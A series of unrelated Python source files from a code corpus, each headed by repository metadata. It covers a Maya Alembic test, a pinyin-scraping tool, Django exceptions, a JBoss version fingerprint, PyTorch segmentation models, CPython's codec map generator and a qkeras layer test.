6.498725, r=True) MayaCmds.setKeyframe(handleName, breakdown=0, hierarchy='none', controlPoints=False, shape=False) self.__files.append(util.expandFileName('testAnimIKRW.abc')) self.__files.append(util.expandFileName('testAnimIKRW01_08.abc')) self.__files.append(util.expandFileName('testAnimIKRW09-16.abc')) # write to files MayaCmds.AbcExport(j='-fr 1 8 -root %s -f %s' % (name, self.__files[-2])) MayaCmds.AbcExport(j='-fr 9 16 -root %s -f %s' % (name, self.__files[-1])) MayaCmds.select(name) MayaCmds.group(name='original') subprocess.call(self.__abcStitcher + self.__files[-3:]) # read from file MayaCmds.AbcImport(self.__files[-3], mode='import') # make sure the translate and rotation are the same nodes1 = ["|original|joint1", "|original|joint1|joint2", "|original|joint1|joint2|joint3", "|original|joint1|joint2|joint3|joint4"] nodes2 = ["|joint1", "|joint1|joint2", "|joint1|joint2|joint3", "|joint1|joint2|joint3|joint4"] for t in range(1, 25): MayaCmds.currentTime(t, update=True) for i in range(0, 4): self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.tx'), MayaCmds.getAttr(nodes2[i]+'.tx'), 4) self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.ty'), MayaCmds.getAttr(nodes2[i]+'.ty'), 4) self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.tz'), MayaCmds.getAttr(nodes2[i]+'.tz'), 4)
tools/improve_8105.py
dophist/pinyin-data
823
30788
<reponame>dophist/pinyin-data # -*- coding: utf-8 -*- """补充 8105 中汉字的拼音数据""" from collections import namedtuple import re import sys from pyquery import PyQuery import requests re_pinyin = re.compile(r'拼音:(?P<pinyin>\S+) ') re_code = re.compile(r'统一码\w?:(?P<code>\S+) ') re_alternate = re.compile(r'异体字:\s+?(?P<alternate>\S+)') HanziInfo = namedtuple('HanziInfo', 'pinyin code alternate') def fetch_html(url, params): response = requests.get(url, params=params) return response.content def fetch_info(hanzi): url = 'http://www.guoxuedashi.com/zidian/so.php' params = { 'sokeyzi': hanzi, 'kz': 1, 'submit': '', } html = fetch_html(url, params) pq = PyQuery(html) pq = PyQuery(pq('table.zui td')[1]) text = pq('tr').text() text_alternate = pq(html)('.info_txt2')('em').text() pinyin = '' pinyin_match = re_pinyin.search(text) if pinyin_match is not None: pinyin = pinyin_match.group('pinyin') code = re_code.search(text).group('code') alternate = '' alternate_match = re_alternate.search(text_alternate) if alternate_match is not None: alternate = alternate_match.group('alternate') return HanziInfo(pinyin, code, alternate) def parse_hanzi(hanzi): info = fetch_info(hanzi) if (not info.pinyin) and info.alternate: alternate = fetch_info(info.alternate) else: alternate = '' return HanziInfo(info.pinyin, info.code, alternate) def main(lines): for line in lines: if line.startswith('# U+') and '<-' in line: # # U+xxx ... -> U+xxx code = line.split(':')[0].strip('# ') # U+xxx -> xxx code = code[2:] info = parse_hanzi(code) pinyin = info.pinyin extra = '' if (not pinyin) and info.alternate: alternate = info.alternate pinyin = alternate.pinyin extra = ' => U+{0}'.format(alternate.code) if ',' in pinyin: first_pinyin, extra_pinyin = pinyin.split(',', 1) pinyin = first_pinyin extra += ' ?-> ' + extra_pinyin if pinyin: line = line.strip() # # U+xxx -> U+xxx line = line[2:] line = line.replace('<-', pinyin) if extra: line += extra yield line.strip() if __name__ == '__main__': args = sys.argv[1:] input_file = args[0] with open(input_file) as fp: for line in main(fp): print(line)
api/features/exceptions.py
SolidStateGroup/Bullet-Train-API
126
30791
from rest_framework import status from rest_framework.exceptions import APIException class FeatureStateVersionError(APIException): status_code = status.HTTP_400_BAD_REQUEST class FeatureStateVersionAlreadyExistsError(FeatureStateVersionError): status_code = status.HTTP_400_BAD_REQUEST def __init__(self, version: int): super(FeatureStateVersionAlreadyExistsError, self).__init__( f"Version {version} already exists for FeatureState." )
tests/__init__.py
RonenTRA/faster-than-requests
857
30811
# Allow tests/ directory to see faster_than_requests/ package on PYTHONPATH import sys from pathlib import Path sys.path.append(str(Path(__file__).parent.parent))
html/semantics/scripting-1/the-script-element/module/resources/delayed-modulescript.py
meyerweb/wpt
14,668
30838
<filename>html/semantics/scripting-1/the-script-element/module/resources/delayed-modulescript.py<gh_stars>1000+ import time def main(request, response): delay = float(request.GET.first(b"ms", 500)) time.sleep(delay / 1E3) return [(b"Content-type", b"text/javascript")], u"export let delayedLoaded = true;"
src/platform/jboss/fingerprints/JBoss71Manage.py
0x27/clusterd
539
30884
<filename>src/platform/jboss/fingerprints/JBoss71Manage.py from src.platform.jboss.interfaces import JINTERFACES from cprint import FingerPrint class FPrint(FingerPrint): def __init__(self): self.platform = "jboss" self.version = "7.1" self.title = JINTERFACES.MM self.uri = "/console/app/gwt/chrome/chrome_rtl.css" self.port = 9990 self.hash = "14755bd918908c2703c57bd1a52046b6"
YNet/stage2/Model.py
cancertech/-cancer_diagnosis
126
30896
<gh_stars>100-1000 # # author: <NAME> # Project Description: This repository contains source code for semantically segmenting WSIs; however, it could be easily # adapted for other domains such as natural image segmentation # File Description: This file contains the CNN models # ============================================================================== import torch import torch.nn as nn class CBR(nn.Module): def __init__(self, nIn, nOut, kSize, stride=1): super().__init__() padding = int((kSize - 1) / 2) self.conv = nn.Conv2d(nIn, nOut, kSize, stride=stride, padding=padding, bias=False) self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-03) self.act = nn.ReLU(True) def forward(self, input): output = self.conv(input) output = self.bn(output) output = self.act(output) return output class CB(nn.Module): def __init__(self, nIn, nOut, kSize, stride=1): super().__init__() padding = int((kSize - 1) / 2) self.conv = nn.Conv2d(nIn, nOut, kSize, stride=stride, padding=padding, bias=False) self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-03) def forward(self, input): output = self.conv(input) output = self.bn(output) return output class C(nn.Module): def __init__(self, nIn, nOut, kSize, stride=1): super().__init__() padding = int((kSize - 1) / 2) self.conv = nn.Conv2d(nIn, nOut, kSize, stride=stride, padding=padding, bias=False) def forward(self, input): output = self.conv(input) return output class DownSampler(nn.Module): def __init__(self, nIn, nOut): super().__init__() self.conv = nn.Conv2d(nIn, nOut - nIn, 3, stride=2, padding=1, bias=False) self.pool = nn.AvgPool2d(3, stride=2, padding=1) self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3) self.act = nn.ReLU(True) # nn.PReLU(nOut) def forward(self, input): output = torch.cat([self.conv(input), self.pool(input)], 1) output = self.bn(output) output = self.act(output) return output class BasicResidualBlock(nn.Module): def __init__(self, nIn, nOut, prob=0.03): super().__init__() self.c1 = CBR(nIn, nOut, 3, 1) self.c2 = CB(nOut, nOut, 3, 1) self.act = nn.ReLU(True) # nn.PReLU(nOut) # self.drop = nn.Dropout2d(p=prob) def forward(self, input): output = self.c1(input) output = self.c2(output) output = input + output # output = self.drop(output) output = self.act(output) return output class DownSamplerA(nn.Module): def __init__(self, nIn, nOut): super().__init__() self.conv = CBR(nIn, nOut, 3, 2) def forward(self, input): output = self.conv(input) return output class BR(nn.Module): def __init__(self, nOut): super().__init__() self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-03) self.act = nn.ReLU(True) # nn.PReLU(nOut) def forward(self, input): output = self.bn(input) output = self.act(output) return output class CDilated(nn.Module): def __init__(self, nIn, nOut, kSize, stride=1, d=1): super().__init__() padding = int((kSize - 1) / 2) * d self.conv = nn.Conv2d(nIn, nOut, (kSize, kSize), stride=stride, padding=(padding, padding), bias=False, dilation=d) def forward(self, input): output = self.conv(input) return output class CDilated1(nn.Module): def __init__(self, nIn, nOut, kSize, stride=1, d=1): super().__init__() padding = int((kSize - 1) / 2) * d self.conv = nn.Conv2d(nIn, nOut, (kSize, kSize), stride=stride, padding=(padding, padding), bias=False, dilation=d) self.br = BR(nOut) def forward(self, input): output = self.conv(input) return self.br(output) class DilatedParllelResidualBlockB(nn.Module): def __init__(self, nIn, nOut, prob=0.03): super().__init__() n = int(nOut / 5) n1 = nOut - 4 * n self.c1 = C(nIn, n, 1, 1) self.d1 = CDilated(n, n1, 3, 1, 1) self.d2 = CDilated(n, n, 3, 1, 2) self.d4 = CDilated(n, n, 3, 1, 4) self.d8 = CDilated(n, n, 3, 1, 8) self.d16 = CDilated(n, n, 3, 1, 16) self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3) self.act = nn.ReLU(True) # nn.PReLU(nOut) # self.drop = nn.Dropout2d(p=prob) def forward(self, input): output1 = self.c1(input) d1 = self.d1(output1) d2 = self.d2(output1) d4 = self.d4(output1) d8 = self.d8(output1) d16 = self.d16(output1) add1 = d2 add2 = add1 + d4 add3 = add2 + d8 add4 = add3 + d16 combine = torch.cat([d1, add1, add2, add3, add4], 1) combine_in_out = input + combine output = self.bn(combine_in_out) # output = self.drop(output) output = self.act(output) return output class DilatedParllelResidualBlockB1(nn.Module): def __init__(self, nIn, nOut, prob=0.03): super().__init__() n = int(nOut / 4) n1 = nOut - 3 * n self.c1 = C(nIn, n, 3, 1) self.d1 = CDilated(n, n1, 3, 1, 1) self.d2 = CDilated(n, n, 3, 1, 2) self.d4 = CDilated(n, n, 3, 1, 4) self.d8 = CDilated(n, n, 3, 1, 8) self.d16 = CDilated(n, n, 3, 1, 16) self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3) self.act = nn.ReLU(True) # nn.PReLU(nOut) # self.drop = nn.Dropout2d(p=prob) def forward(self, input): output1 = self.c1(input) d1 = self.d1(output1) d2 = self.d2(output1) d4 = self.d4(output1) d8 = self.d8(output1) # d16 = self.d16(output1) add1 = d2 add2 = add1 + d4 add3 = add2 + d8 # add4 = add3 + d16 combine = torch.cat([d1, add1, add2, add3], 1) combine_in_out = input + combine output = self.bn(combine_in_out) # output = self.drop(output) output = self.act(output) return output class PSPDec(nn.Module): def __init__(self, nIn, nOut, downSize, upSize=48): super().__init__() self.features = nn.Sequential( nn.AdaptiveAvgPool2d(downSize), nn.Conv2d(nIn, nOut, 1, bias=False), nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3), nn.ReLU(True), # nn.PReLU(nOut), nn.Upsample(size=upSize, mode='bilinear') ) def forward(self, x): return self.features(x) class ResNetC1(nn.Module): ''' Segmentation model with ESP as the encoding block. This is the same as in stage 1 ''' def __init__(self, classes): super().__init__() self.level1 = CBR(3, 16, 7, 2) # 384 x 384 self.p01 = PSPDec(16 + classes, classes, 160, 192) self.p02 = PSPDec(16 + classes, classes, 128, 192) self.p03 = PSPDec(16 + classes, classes, 96, 192) self.p04 = PSPDec(16 + classes, classes, 72, 192) self.class_0 = nn.Sequential( nn.Conv2d(16 + 5 * classes, classes, 3, padding=1, bias=False), nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3), nn.ReLU(True), # nn.PReLU(classes), # nn.Dropout2d(.1), nn.Conv2d(classes, classes, 7, padding=3, bias=False) ) self.level2 = DownSamplerA(16, 128) self.level2_0 = DilatedParllelResidualBlockB1(128, 128) self.level2_1 = DilatedParllelResidualBlockB1(128, 128) # 512 x 256 self.p10 = PSPDec(8 + 256, 64, 80, 96) self.p20 = PSPDec(8 + 256, 64, 64, 96) self.p30 = PSPDec(8 + 256, 64, 48, 96) self.p40 = PSPDec(8 + 256, 64, 36, 96) self.class_1 = nn.Sequential( nn.Conv2d(8 + 256 + 64 * 4, classes, 3, padding=1, bias=False), nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3), nn.ReLU(True), # nn.PReLU(classes), # nn.Dropout2d(.1), nn.Conv2d(classes, classes, 1, bias=False), nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3), nn.ReLU(True) ) self.br_2 = BR(256) self.level3_0 = DownSamplerA(256, 256) self.level3_1 = DilatedParllelResidualBlockB1(256, 256, 0.3) self.level3_2 = DilatedParllelResidualBlockB1(256, 256, 0.3) # 256 x 128 self.level4_1 = DilatedParllelResidualBlockB1(256, 256, 0.3) self.level4_2 = DilatedParllelResidualBlockB1(256, 256, 0.3) self.level4_3 = DilatedParllelResidualBlockB1(256, 256, 0.3) # 128 x 64 self.p1 = PSPDec(512, 128, 40) self.p2 = PSPDec(512, 128, 32) self.p3 = PSPDec(512, 128, 24) self.p4 = PSPDec(512, 128, 18) self.br_4 = BR(512) self.classifier = nn.Sequential( nn.Conv2d(512 + 4 * 128, 128, 1, padding=0, bias=False), nn.BatchNorm2d(128, momentum=0.95, eps=1e-3), nn.ReLU(True), # nn.PReLU(classes), # nn.Dropout2d(.1), nn.Conv2d(128, classes, 3, padding=1, bias=False), nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3), nn.ReLU(True), nn.Conv2d(classes, classes, 1, bias=False), nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3), nn.ReLU(True) ) # C(320, classes, 7, 1) self.upsample_1 = nn.Upsample(scale_factor=2, mode='bilinear') self.upsample_2 = nn.Upsample(scale_factor=2, mode='bilinear') self.upsample_3 = nn.Upsample(scale_factor=2, mode='bilinear') def forward(self, input1): # input1 = self.cmlrn(input) output0 = self.level1(input1) output1_0 = self.level2(output0) output1 = self.level2_0(output1_0) output1 = self.level2_1(output1) output1 = self.br_2(torch.cat([output1_0, output1], 1)) output2_0 = self.level3_0(output1) output2 = self.level3_1(output2_0) output2 = self.level3_2(output2) output3 = self.level4_1(output2) output3 = self.level4_2(output3) output3 = self.level4_3(output3) output3 = self.br_4(torch.cat([output2_0, output3], 1)) output3 = self.classifier( torch.cat([output3, self.p1(output3), self.p2(output3), self.p3(output3), self.p4(output3)], 1)) output3 = self.upsample_3(output3) combine_up_23 = torch.cat([output3, output1], 1) output23_hook = self.class_1(torch.cat( [combine_up_23, self.p10(combine_up_23), self.p20(combine_up_23), self.p30(combine_up_23), self.p40(combine_up_23)], 1)) output23_hook = self.upsample_2(output23_hook) combine_up = torch.cat([output0, output23_hook], 1) output0_hook = self.class_0(torch.cat( [combine_up, self.p01(combine_up), self.p02(combine_up), self.p03(combine_up), self.p04(combine_up)], 1)) # output3 = output2_0 + output3 # classifier = self.classifier(output3) classifier = self.upsample_1(output0_hook) return classifier class ResNetC1_YNet(nn.Module): ''' Jointly learning the segmentation and classification with ESP as encoding blocks ''' def __init__(self, classes, diagClasses, segNetFile=None): super().__init__() self.level4_0 = DownSamplerA(512, 128) self.level4_1 = DilatedParllelResidualBlockB1(128, 128, 0.3) self.level4_2 = DilatedParllelResidualBlockB1(128, 128, 0.3) self.br_con_4 = BR(256) self.level5_0 = DownSamplerA(256, 64) self.level5_1 = DilatedParllelResidualBlockB1(64, 64, 0.3) self.level5_2 = DilatedParllelResidualBlockB1(64, 64, 0.3) self.br_con_5 = BR(128) self.global_Avg = nn.AdaptiveAvgPool2d(1) self.fc1 = nn.Linear(128, 64) self.fc2 = nn.Linear(64, diagClasses) # segmentation model self.segNet = ResNetC1(classes) if segNetFile is not None: print('Loading pre-trained segmentation model') self.segNet.load_state_dict(torch.load(segNetFile)) self.modules = [] for i, m in enumerate(self.segNet.children()): self.modules.append(m) def forward(self, input1): output0 = self.modules[0](input1) output1_0 = self.modules[6](output0) # downsample output1 = self.modules[7](output1_0) output1 = self.modules[8](output1) output1 = self.modules[14](torch.cat([output1_0, output1], 1)) output2_0 = self.modules[15](output1) # downsample output2 = self.modules[16](output2_0) output2 = self.modules[17](output2) output3 = self.modules[18](output2) output3 = self.modules[19](output3) output3 = self.modules[20](output3) output3_hook = self.modules[25](torch.cat([output2_0, output3], 1)) output3 = self.modules[26]( torch.cat([output3_hook, self.modules[21](output3_hook), self.modules[22](output3_hook), self.modules[23](output3_hook), self.modules[24](output3_hook)], 1)) output3 = self.modules[29](output3) combine_up_23 = torch.cat([output3, output1], 1) output23_hook = self.modules[13](torch.cat( [combine_up_23, self.modules[9](combine_up_23), self.modules[10](combine_up_23), self.modules[11](combine_up_23), self.modules[12](combine_up_23)], 1)) output23_hook = self.modules[28](output23_hook) combine_up = torch.cat([output0, output23_hook], 1) output0_hook = self.modules[5](torch.cat( [combine_up, self.modules[1](combine_up), self.modules[2](combine_up), self.modules[3](combine_up), self.modules[4](combine_up)], 1)) # segmentation classsifier classifier = self.modules[27](output0_hook) # diagnostic branch l5_0 = self.level4_0(output3_hook) l5_1 = self.level4_1(l5_0) l5_2 = self.level4_2(l5_1) l5_con = self.br_con_4(torch.cat([l5_0, l5_2], 1)) l6_0 = self.level5_0(l5_con) l6_1 = self.level5_1(l6_0) l6_2 = self.level5_2(l6_1) l6_con = self.br_con_5(torch.cat([l6_0, l6_2], 1)) glbAvg = self.global_Avg(l6_con) flatten = glbAvg.view(glbAvg.size(0), -1) fc1 = self.fc1(flatten) diagClass = self.fc2(fc1) return classifier, diagClass class ResNetD1(nn.Module): ''' Segmentation model with RCB as encoding blocks. This is the same as in Stage 1 ''' def __init__(self, classes): super().__init__() self.level1 = CBR(3, 16, 7, 2) # 384 x 384 self.p01 = PSPDec(16 + classes, classes, 160, 192) self.p02 = PSPDec(16 + classes, classes, 128, 192) self.p03 = PSPDec(16 + classes, classes, 96, 192) self.p04 = PSPDec(16 + classes, classes, 72, 192) self.class_0 = nn.Sequential( nn.Conv2d(16 + 5 * classes, classes, 3, padding=1, bias=False), nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3), nn.ReLU(True), nn.Conv2d(classes, classes, 7, padding=3, bias=False) ) self.level2 = DownSamplerA(16, 128) self.level2_0 = BasicResidualBlock(128, 128) self.level2_1 = BasicResidualBlock(128, 128) # 512 x 256 self.p10 = PSPDec(8 + 256, 64, 80, 96) self.p20 = PSPDec(8 + 256, 64, 64, 96) self.p30 = PSPDec(8 + 256, 64, 48, 96) self.p40 = PSPDec(8 + 256, 64, 36, 96) self.class_1 = nn.Sequential( nn.Conv2d(8 + 256 + 64 * 4, classes, 3, padding=1, bias=False), nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3), nn.ReLU(True), nn.Conv2d(classes, classes, 1, bias=False), nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3), nn.ReLU(True) ) self.br_2 = BR(256) self.level3_0 = DownSamplerA(256, 256) self.level3_1 = BasicResidualBlock(256, 256, 0.3) self.level3_2 = BasicResidualBlock(256, 256, 0.3) self.level4_1 = BasicResidualBlock(256, 256, 0.3) self.level4_2 = BasicResidualBlock(256, 256, 0.3) self.level4_3 = BasicResidualBlock(256, 256, 0.3) self.p1 = PSPDec(512, 128, 40) self.p2 = PSPDec(512, 128, 32) self.p3 = PSPDec(512, 128, 24) self.p4 = PSPDec(512, 128, 18) self.br_4 = BR(512) self.classifier = nn.Sequential( nn.Conv2d(512 + 128 * 4, 128, 1, padding=0, bias=False), nn.BatchNorm2d(128, momentum=0.95, eps=1e-3), nn.ReLU(True), nn.Conv2d(128, classes, 3, padding=1, bias=False), nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3), nn.ReLU(True), nn.Conv2d(classes, classes, 1, bias=False), nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3), nn.ReLU(True) ) self.upsample_1 = nn.Upsample(scale_factor=2, mode='bilinear') self.upsample_2 = nn.Upsample(scale_factor=2, mode='bilinear') self.upsample_3 = nn.Upsample(scale_factor=2, mode='bilinear') def forward(self, input1): # input1 = self.cmlrn(input) output0 = self.level1(input1) output1_0 = self.level2(output0) output1 = self.level2_0(output1_0) output1 = self.level2_1(output1) output1 = self.br_2(torch.cat([output1_0, output1], 1)) output2_0 = self.level3_0(output1) output2 = self.level3_1(output2_0) output2 = self.level3_2(output2) output3 = self.level4_1(output2) output3 = self.level4_2(output3) output3 = self.level4_3(output3) output3 = self.br_4(torch.cat([output2_0, output3], 1)) output3 = self.classifier( torch.cat([output3, self.p1(output3), self.p2(output3), self.p3(output3), self.p4(output3)], 1)) output3 = self.upsample_3(output3) combine_up_23 = torch.cat([output3, output1], 1) output23_hook = self.class_1(torch.cat( [combine_up_23, self.p10(combine_up_23), self.p20(combine_up_23), self.p30(combine_up_23), self.p40(combine_up_23)], 1)) output23_hook = self.upsample_2(output23_hook) combine_up = torch.cat([output23_hook, output0], 1) output0_hook = self.class_0(torch.cat( [combine_up, self.p01(combine_up), self.p02(combine_up), self.p03(combine_up), self.p04(combine_up)], 1)) classifier = self.upsample_1(output0_hook) return classifier class ResNetD1_YNet(nn.Module): ''' Jointly learning the segmentation and classification with RCB as encoding blocks ''' def __init__(self, classes, diagClasses, segNetFile=None): super().__init__() self.level4_0 = DownSamplerA(512, 128) # 24x24 self.level4_1 = BasicResidualBlock(128, 128, 0.3) self.level4_2 = BasicResidualBlock(128, 128, 0.3) self.br_con_4 = BR(256) self.level5_0 = DownSamplerA(256, 64) # 12x12 self.level5_1 = BasicResidualBlock(64, 64, 0.3) self.level5_2 = BasicResidualBlock(64, 64, 0.3) self.br_con_5 = BR(128) self.global_Avg = nn.AdaptiveAvgPool2d(1) self.fc1 = nn.Linear(128, 64) self.fc2 = nn.Linear(64, diagClasses) self.segNet = ResNetD1(classes) # 384 x 384 if segNetFile is not None: print('Loading segmentation pre-trained model') self.segNet.load_state_dict(torch.load(segNetFile)) self.modules = [] for i, m in enumerate(self.segNet.children()): self.modules.append(m) # print(i, m) def forward(self, input1): output0 = self.modules[0](input1) output1_0 = self.modules[6](output0) # downsample output1 = self.modules[7](output1_0) output1 = self.modules[8](output1) output1 = self.modules[14](torch.cat([output1_0, output1], 1)) output2_0 = self.modules[15](output1) # downsample output2 = self.modules[16](output2_0) output2 = self.modules[17](output2) output3 = self.modules[18](output2) output3 = self.modules[19](output3) output3 = self.modules[20](output3) output3_hook = self.modules[25](torch.cat([output2_0, output3], 1)) output3 = self.modules[26]( torch.cat([output3_hook, self.modules[21](output3_hook), self.modules[22](output3_hook), self.modules[23](output3_hook), self.modules[24](output3_hook)], 1)) output3 = self.modules[29](output3) combine_up_23 = torch.cat([output3, output1], 1) output23_hook = self.modules[13](torch.cat( [combine_up_23, self.modules[9](combine_up_23), self.modules[10](combine_up_23), self.modules[11](combine_up_23), self.modules[12](combine_up_23)], 1)) output23_hook = self.modules[28](output23_hook) combine_up = torch.cat([output0, output23_hook], 1) output0_hook = self.modules[5](torch.cat( [combine_up, self.modules[1](combine_up), self.modules[2](combine_up), self.modules[3](combine_up), self.modules[4](combine_up)], 1)) # segmentation classsifier classifier = self.modules[27](output0_hook) # diagnostic branch l5_0 = self.level4_0(output3_hook) l5_1 = self.level4_1(l5_0) l5_2 = self.level4_2(l5_1) l5_con = self.br_con_4(torch.cat([l5_0, l5_2], 1)) l6_0 = self.level5_0(l5_con) l6_1 = self.level5_1(l6_0) l6_2 = self.level5_2(l6_1) l6_con = self.br_con_5(torch.cat([l6_0, l6_2], 1)) glbAvg = self.global_Avg(l6_con) flatten = glbAvg.view(glbAvg.size(0), -1) fc1 = self.fc1(flatten) diagClass = self.fc2(fc1) return classifier, diagClass
Tools/unicode/genmap_support.py
shawwn/cpython
52,316
30904
<filename>Tools/unicode/genmap_support.py # # genmap_support.py: Multibyte Codec Map Generator # # Original Author: <NAME> <<EMAIL>> # Modified Author: <NAME> <<EMAIL>> # class BufferedFiller: def __init__(self, column=78): self.column = column self.buffered = [] self.cline = [] self.clen = 0 self.count = 0 def write(self, *data): for s in data: if len(s) > self.column: raise ValueError("token is too long") if len(s) + self.clen > self.column: self.flush() self.clen += len(s) self.cline.append(s) self.count += 1 def flush(self): if not self.cline: return self.buffered.append(''.join(self.cline)) self.clen = 0 del self.cline[:] def printout(self, fp): self.flush() for l in self.buffered: fp.write(f'{l}\n') del self.buffered[:] def __len__(self): return self.count class DecodeMapWriter: filler_class = BufferedFiller def __init__(self, fp, prefix, decode_map): self.fp = fp self.prefix = prefix self.decode_map = decode_map self.filler = self.filler_class() def update_decode_map(self, c1range, c2range, onlymask=(), wide=0): c2values = range(c2range[0], c2range[1] + 1) for c1 in range(c1range[0], c1range[1] + 1): if c1 not in self.decode_map or (onlymask and c1 not in onlymask): continue c2map = self.decode_map[c1] rc2values = [n for n in c2values if n in c2map] if not rc2values: continue c2map[self.prefix] = True c2map['min'] = rc2values[0] c2map['max'] = rc2values[-1] c2map['midx'] = len(self.filler) for v in range(rc2values[0], rc2values[-1] + 1): if v in c2map: self.filler.write('%d,' % c2map[v]) else: self.filler.write('U,') def generate(self, wide=False): if not wide: self.fp.write(f"static const ucs2_t __{self.prefix}_decmap[{len(self.filler)}] = {{\n") else: self.fp.write(f"static const Py_UCS4 __{self.prefix}_decmap[{len(self.filler)}] = {{\n") self.filler.printout(self.fp) self.fp.write("};\n\n") if not wide: self.fp.write(f"static const struct dbcs_index {self.prefix}_decmap[256] = {{\n") else: self.fp.write(f"static const struct widedbcs_index {self.prefix}_decmap[256] = {{\n") for i in range(256): if i in self.decode_map and self.prefix in self.decode_map[i]: m = self.decode_map prefix = self.prefix else: self.filler.write("{", "0,", "0,", "0", "},") continue self.filler.write("{", "__%s_decmap" % prefix, "+", "%d" % m[i]['midx'], ",", "%d," % m[i]['min'], "%d" % m[i]['max'], "},") self.filler.printout(self.fp) self.fp.write("};\n\n") class EncodeMapWriter: filler_class = BufferedFiller elemtype = 'DBCHAR' indextype = 'struct unim_index' def __init__(self, fp, prefix, encode_map): self.fp = fp self.prefix = prefix self.encode_map = encode_map self.filler = self.filler_class() def generate(self): self.buildmap() self.printmap() def buildmap(self): for c1 in range(0, 256): if c1 not in self.encode_map: continue c2map = self.encode_map[c1] rc2values = [k for k in c2map.keys()] rc2values.sort() if not rc2values: continue c2map[self.prefix] = True c2map['min'] = rc2values[0] c2map['max'] = rc2values[-1] c2map['midx'] = len(self.filler) for v in range(rc2values[0], rc2values[-1] + 1): if v not in c2map: self.write_nochar() elif isinstance(c2map[v], int): self.write_char(c2map[v]) elif isinstance(c2map[v], tuple): self.write_multic(c2map[v]) else: raise ValueError def write_nochar(self): self.filler.write('N,') def write_multic(self, point): self.filler.write('M,') def write_char(self, point): self.filler.write(str(point) + ',') def printmap(self): self.fp.write(f"static const {self.elemtype} __{self.prefix}_encmap[{len(self.filler)}] = {{\n") self.filler.printout(self.fp) self.fp.write("};\n\n") self.fp.write(f"static const {self.indextype} {self.prefix}_encmap[256] = {{\n") for i in range(256): if i in self.encode_map and self.prefix in self.encode_map[i]: self.filler.write("{", "__%s_encmap" % self.prefix, "+", "%d" % self.encode_map[i]['midx'], ",", "%d," % self.encode_map[i]['min'], "%d" % self.encode_map[i]['max'], "},") else: self.filler.write("{", "0,", "0,", "0", "},") continue self.filler.printout(self.fp) self.fp.write("};\n\n") def open_mapping_file(path, source): try: f = open(path) except IOError: raise SystemExit(f'{source} is needed') return f def print_autogen(fo, source): fo.write(f'// AUTO-GENERATED FILE FROM {source}: DO NOT EDIT\n') def loadmap(fo, natcol=0, unicol=1, sbcs=0): print("Loading from", fo) fo.seek(0, 0) decmap = {} for line in fo: line = line.split('#', 1)[0].strip() if not line or len(line.split()) < 2: continue row = [eval(e) for e in line.split()] loc, uni = row[natcol], row[unicol] if loc >= 0x100 or sbcs: decmap.setdefault((loc >> 8), {}) decmap[(loc >> 8)][(loc & 0xff)] = uni return decmap
tests/qlayers_test.py
kshithijiyer/qkeras
388
30905
<reponame>kshithijiyer/qkeras # Copyright 2019 Google LLC # # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Test layers from qlayers.py.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np from numpy.testing import assert_allclose import pytest import logging from tensorflow.keras import backend as K from tensorflow.keras.layers import Activation from tensorflow.keras.layers import Flatten from tensorflow.keras.layers import Input from tensorflow.keras.models import Model from tensorflow.keras.backend import clear_session from qkeras import QActivation from qkeras import QDense from qkeras import quantized_bits from qkeras.utils import model_save_quantized_weights from qkeras.utils import quantized_model_from_json def qdense_util(layer_cls, kwargs=None, input_data=None, weight_data=None, expected_output=None): """qlayer test utility.""" input_shape = input_data.shape input_dtype = input_data.dtype layer = layer_cls(**kwargs) x = Input(shape=input_shape[1:], dtype=input_dtype) y = layer(x) layer.set_weights(weight_data) model = Model(x, y) actual_output = model.predict(input_data) if expected_output is not None: assert_allclose(actual_output, expected_output, rtol=1e-4) @pytest.mark.parametrize( 'layer_kwargs, input_data, weight_data, bias_data, expected_output', [ ( { 'units': 2, 'use_bias': True, 'kernel_initializer': 'glorot_uniform', 'bias_initializer': 'zeros' }, np.array([[1, 1, 1, 1]], dtype=K.floatx()), np.array([[10, 20], [10, 20], [10, 20], [10, 20]], dtype=K.floatx()), # weight_data np.array([0, 0], dtype=K.floatx()), # bias np.array([[40, 80]], dtype=K.floatx())), # expected_output ( { 'units': 2, 'use_bias': True, 'kernel_initializer': 'glorot_uniform', 'bias_initializer': 'zeros', 'kernel_quantizer': 'quantized_bits(2,0,alpha=1.0)', 'bias_quantizer': 'quantized_bits(2,0)', }, np.array([[1, 1, 1, 1]], dtype=K.floatx()), np.array([[10, 20], [10, 20], [10, 20], [10, 20]], dtype=K.floatx()), # weight_data np.array([0, 0], dtype=K.floatx()), # bias np.array([[2, 2]], dtype=K.floatx())), #expected_output ]) def test_qdense(layer_kwargs, input_data, weight_data, bias_data, expected_output): qdense_util( layer_cls=QDense, kwargs=layer_kwargs, input_data=input_data, weight_data=[weight_data, bias_data], expected_output=expected_output) if __name__ == '__main__': pytest.main([__file__])
tests/test_records.py
tomfallen/python-fitparse
548
30935
